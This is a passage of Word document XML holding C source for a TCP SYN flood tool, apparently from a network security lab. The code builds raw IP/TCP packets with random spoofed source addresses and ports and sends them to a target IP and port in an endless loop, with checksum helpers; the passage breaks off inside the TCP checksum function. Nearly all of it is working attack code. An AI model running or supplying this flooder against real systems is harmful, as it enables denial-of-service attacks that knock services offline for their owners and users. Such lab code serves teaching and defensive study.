    </w:p>
    <w:p w14:paraId="38A239BC" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="428DA99A" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>//#define DEST_IP    "10.9.0.5"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB05DA6" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>//#define DEST_PORT  23  // Attack the web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0587F1" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>#define PACKET_LEN 1500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3CEBD6" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="2B304EEE" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>unsigned short calculate_tcp_checksum(struct ipheader *ip);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7750C04C" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="6FEE1A85" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>/*************************************************************</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7C4459" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">  Given an IP packet, send it out using a raw socket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6656D0B0" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>**************************************************************/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B90DF48" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>void send_raw_ip_packet(struct ipheader* ip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD2A3D8" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE49BBD" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">    struct sockaddr_in dest_info;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23378EAF" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">    int enable = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25698E24" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="5D7EC841" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">    // Step 1: Create a raw network socket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D542E6" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">    int sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077450DE" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">    if (sock &lt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144F09ED" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">      fprintf(stderr, "socket() failed: %s\n", strerror(errno));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373C8232" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">      exit(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275B7B60" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B98E917" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="343301AE" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">    // Step 2: Set socket option.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D44076" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">    setsockopt(sock, IPPROTO_IP, IP_HDRINCL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B9B6F3" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">                     &amp;enable, sizeof(enable));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAC5814" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="61BBBBE6" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">    // Step 3: Provide needed information about destination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A244F14" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">    dest_info.sin_family = AF_INET;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFA9B04" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">    dest_info.sin_addr = ip-&gt;iph_destip;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7219BFE4" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="60E38D0E" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">    // Step 4: Send the packet out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A73C6A" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">    sendto(sock, ip, ntohs(ip-&gt;iph_len), 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC55851" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">           (struct sockaddr *)&amp;dest_info, sizeof(dest_info));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DA02E7" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">    close(sock);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAE2BE9" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD77B3D" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="6E9F94B8" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="7B195492" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>/******************************************************************</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CE5D74" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">  Spoof a TCP SYN packet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E3DAB9" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>*******************************************************************/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484AABCC" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>int main(int argc, char *argv[]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AD7A9C" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   char buffer[PACKET_LEN];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6145BA24" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   struct ipheader *ip = (struct ipheader *) buffer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B02E080" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   struct tcpheader *tcp = (struct tcpheader *) (buffer +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486B7E25" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">                                   sizeof(struct ipheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED31DA4" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="6425125D" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   if (argc &lt; 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3E684D" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">     printf("Please provide IP and Port number\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E344F1A" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">     printf("Usage: synflood ip port\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CB7F79" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">     exit(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E6156D" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D0F9F3" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="2111A2CA" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   char *DEST_IP   = argv[1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9EEC1C" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   int DEST_PORT   = atoi(argv[2]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D4C803" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="7909ECC2" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="0CCCCE3C" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   srand(time(0)); // Initialize the seed for random # generation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28107BBC" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   while (1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B67AE05" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">     memset(buffer, 0, PACKET_LEN);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738BBDAB" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">     /*********************************************************</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F850BE" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">        Step 1: Fill in the TCP header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3E5A2C" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">     ********************************************************/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421618F6" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">     tcp-&gt;tcp_sport = rand(); // Use random source port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C85A13" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">     tcp-&gt;tcp_dport = htons(DEST_PORT);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75347A65" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">     tcp-&gt;tcp_seq   = rand(); // Use random sequence #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79485951" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">     tcp-&gt;tcp_offx2 = 0x50;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67977687" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">     tcp-&gt;tcp_flags = TH_SYN; // Enable the SYN bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AB0DDB" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">     tcp-&gt;tcp_win   = htons(20000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153F6B38" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">     tcp-&gt;tcp_sum   = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0102F5" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="6ADB5302" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">     /*********************************************************</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0C640A" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">        Step 2: Fill in the IP header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2566DEA0" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">     ********************************************************/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767777DD" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">     ip-&gt;iph_ver = 4;   // Version (IPV4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603E4E06" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">     ip-&gt;iph_ihl = 5;   // Header length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51441605" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">     ip-&gt;iph_ttl = 50;  // Time to live</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0D8F7D" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">     ip-&gt;iph_sourceip.s_addr = rand(); // Use a random IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4687CC" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">     ip-&gt;iph_destip.s_addr = inet_addr(DEST_IP);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD491B2" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">     ip-&gt;iph_protocol = IPPROTO_TCP; // The value is 6.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E64BC8" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">     ip-&gt;iph_len = htons(sizeof(struct ipheader) +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F603B5" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">                         sizeof(struct tcpheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F91E9A" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="4517F0B5" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">     // Calculate tcp checksum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427A25C6" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">     tcp-&gt;tcp_sum = calculate_tcp_checksum(ip);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6307E47C" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="40D554CB" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">     /*********************************************************</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5322D13A" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">       Step 3: Finally, send the spoofed packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C183F8" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">     ********************************************************/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF0C280" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">     send_raw_ip_packet(ip);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2262504A" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AEEBAB" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="4193CF38" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8177DA" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DFBE3D" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="4D91EE0B" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="72660B90" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>unsigned short in_cksum (unsigned short *buf, int length)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD67EE9" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CF8430" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   unsigned short *w = buf;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0F1396" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   int nleft = length;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436F1591" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   int sum = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179B3EBC" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   unsigned short temp=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C26AB8" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="7284E610" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   /*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7AF01E" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">    * The algorithm uses a 32 bit accumulator (sum), adds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5A95EC" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">    * sequential 16 bit words to it, and at the end, folds back all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603675A5" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">    * the carry bits from the top 16 bits into the lower 16 bits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244C1EE6" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">    */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174A1CDF" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   while (nleft &gt; 1)  {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11425D26" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">       sum += *w++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FC2EE1" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">       nleft -= 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9F50CC" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEB5A87" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="1BFCE4A2" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   /* treat the odd byte at the end, if any */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDBCA6E" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   if (nleft == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF1C4EA" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">        *(u_char *)(&amp;temp) = *(u_char *)w ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1C0E82" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">        sum += temp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726598B2" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9FCE17" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="13B211B7" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   /* add back carry outs from top 16 bits to low 16 bits */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315E464A" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   sum = (sum &gt;&gt; 16) + (sum &amp; 0xffff);  // add hi 16 to low 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BB5030" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   sum += (sum &gt;&gt; 16);                  // add carry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150009F9" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   return (unsigned short)(~sum);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8B4257" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227CD5E1" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="2A25DD26" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>/****************************************************************</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A1CE6E" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">  TCP checksum is calculated on the pseudo header, which includes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F78FA59" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">  the TCP header and data, plus some part of the IP header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F28FE7F" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">  Therefore, we need to construct the pseudo header first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B849FE" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>*****************************************************************/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FB78DA" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="14582C66" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="15ABF96F" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>unsigned short calculate_tcp_checksum(struct ipheader *ip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018CC988" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111C0E59" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   struct tcpheader *tcp = (struct tcpheader *)((u_char *)ip +</w:t>
      </w:r>
    </w:p>
